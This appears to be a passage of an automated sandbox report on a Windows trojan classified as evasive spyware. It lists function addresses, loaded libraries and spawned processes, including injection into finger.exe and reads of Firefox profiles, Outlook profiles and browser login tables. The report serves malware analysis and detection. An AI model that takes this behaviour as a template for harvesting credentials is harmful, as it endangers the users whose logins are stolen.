                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334CE9311_2_0334CE93
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032A2E9011_2_032A2E90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334EEDB11_2_0334EEDB
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329AD0011_2_0329AD00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332CD1F11_2_0332CD1F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032A8DBF11_2_032A8DBF
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328ADE011_2_0328ADE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03290C0011_2_03290C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03330CB511_2_03330CB5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03280CF211_2_03280CF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334132D11_2_0334132D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0327D34C11_2_0327D34C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032D739A11_2_032D739A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032952A011_2_032952A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033312ED11_2_033312ED
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AB2C011_2_032AB2C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C516C11_2_032C516C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0327F17211_2_0327F172
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0335B16B11_2_0335B16B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329B1B011_2_0329B1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334F0E011_2_0334F0E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033470E911_2_033470E9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032970C011_2_032970C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333F0CC11_2_0333F0CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334F7B011_2_0334F7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032817EC11_2_032817EC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032D563011_2_032D5630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033416CC11_2_033416CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334757111_2_03347571
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332D5B011_2_0332D5B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033595C311_2_033595C3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334F43F11_2_0334F43F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328146011_2_03281460
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FB7611_2_0334FB76
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AFB8011_2_032AFB80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03305BF011_2_03305BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032CDBF911_2_032CDBF9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03303A6C11_2_03303A6C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03347A4611_2_03347A46
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FA4911_2_0334FA49
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032D5AA011_2_032D5AA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03331AA311_2_03331AA3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332DAAC11_2_0332DAAC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333DAC611_2_0333DAC6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332591011_2_03325910
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329995011_2_03299950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AB95011_2_032AB950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032FD80011_2_032FD800
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032938E011_2_032938E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FF0911_2_0334FF09
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FFB111_2_0334FFB1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03291F9211_2_03291F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03253FD511_2_03253FD5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03253FD211_2_03253FD2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03299EB011_2_03299EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03347D7311_2_03347D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03293D4011_2_03293D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03341D5A11_2_03341D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AFDC011_2_032AFDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03309C3211_2_03309C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FCF211_2_0334FCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02941ED011_2_02941ED0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293AFF011_2_0293AFF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293CFE011_2_0293CFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293AFE811_2_0293AFE8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293CDC011_2_0293CDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293B13611_2_0293B136
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293B14011_2_0293B140
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294377011_2_02943770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294556011_2_02945560
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0295BC2011_2_0295BC20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AE39811_2_035AE398
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AE4B311_2_035AE4B3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035ACBAA11_2_035ACBAA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AD91811_2_035AD918
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AE84C11_2_035AE84C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AD8E311_2_035AD8E3
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0327B970 appears 283 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 032D7E54 appears 109 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0330F290 appears 105 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 032FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 032C5130 appears 58 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: String function: 01515130 appears 58 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: String function: 0155F290 appears 105 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: String function: 014CB970 appears 283 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: String function: 0154EA12 appears 86 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: String function: 01527E54 appears 109 times
                Source: wSoShbuXnJ.exe, 00000005.00000002.1427654863.0000000003619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000002.1425910097.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000000.1269806018.000000000030E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexDUy.exeL vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000002.1430608474.0000000007350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000002.1427087721.000000000265C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000002.1429535286.00000000067F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000015CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefinger.exej% vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exeBinary or memory string: OriginalFilenamexDUy.exeL vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: wSoShbuXnJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wSoShbuXnJ.exe.logJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\finger.exeFile created: C:\Users\user\AppData\Local\Temp\40F193-3PQJump to behavior
                Source: wSoShbuXnJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wSoShbuXnJ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: finger.exe, 0000000B.00000003.1974593617.0000000002DE4000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1974986374.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3138314418.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1975079747.0000000002DE4000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3138314418.0000000002DE4000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1974534975.0000000002DF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: finger.exe, 0000000B.00000003.1974593617.0000000002DC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, id INTEGER PRIMAx;
                Source: wSoShbuXnJ.exeVirustotal: Detection: 76%
                Source: wSoShbuXnJ.exeReversingLabs: Detection: 71%
                Source: unknownProcess created: C:\Users\user\Desktop\wSoShbuXnJ.exe "C:\Users\user\Desktop\wSoShbuXnJ.exe"
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess created: C:\Users\user\Desktop\wSoShbuXnJ.exe "C:\Users\user\Desktop\wSoShbuXnJ.exe"
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess created: C:\Users\user\Desktop\wSoShbuXnJ.exe "C:\Users\user\Desktop\wSoShbuXnJ.exe"Jump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: wSoShbuXnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: wSoShbuXnJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139651426.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710250709.0000000000D0E000.00000002.00000001.01000000.0000000C.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3137744044.0000000000D0E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1789743504.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1786573717.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: wSoShbuXnJ.exe, wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1789743504.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1786573717.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139651426.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 5_2_0248F028 pushad ; iretd 5_2_0248F029
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 5_2_067CEFE1 push es; iretd 5_2_067CEFE7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041E877 push es; ret 8_2_0041E82F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00416163 pusha ; iretd 8_2_004160B8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00403110 push eax; ret 8_2_00403112
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0040D1E1 push edx; retf 8_2_0040D1EB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041427A push esp; ret 8_2_00414347
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00414222 push esp; ret 8_2_00414347
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0040D2E0 push edi; retf 8_2_0040D2E4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041435B push esp; ret 8_2_00414347
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00401D02 push ss; iretd 8_2_00401D04
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00418D36 push ds; iretd 8_2_00418D3C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00414587 push edi; ret 8_2_0041459C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00414593 push edi; ret 8_2_0041459C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00416626 push eax; ret 8_2_004166A4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00415ED3 pusha ; iretd 8_2_004160B8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041177F pushfd ; ret 8_2_00411786
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041E7E5 push es; ret 8_2_0041E82F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00423783 push edi; iretd 8_2_0042378E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D09AD push ecx; mov dword ptr [esp], ecx8_2_014D09B6
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014A135E push eax; iretd 8_2_014A1369
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0325225F pushad ; ret 11_2_032527F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032527FA pushad ; ret 11_2_032527F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032809AD push ecx; mov dword ptr [esp], ecx11_2_032809B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0325283D push eax; iretd 11_2_03252858
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03251368 push eax; iretd 11_2_03251369
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02950670 push edi; iretd 11_2_0295067B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293E66C pushfd ; ret 11_2_0293E673
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0295066A push edi; iretd 11_2_0295067B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294C47D push cs; ret 11_2_0294C4A1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02942DC0 pusha ; iretd 11_2_02942FA5
                Source: wSoShbuXnJ.exeStatic PE information: section name: .text entropy: 7.737457250389855
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
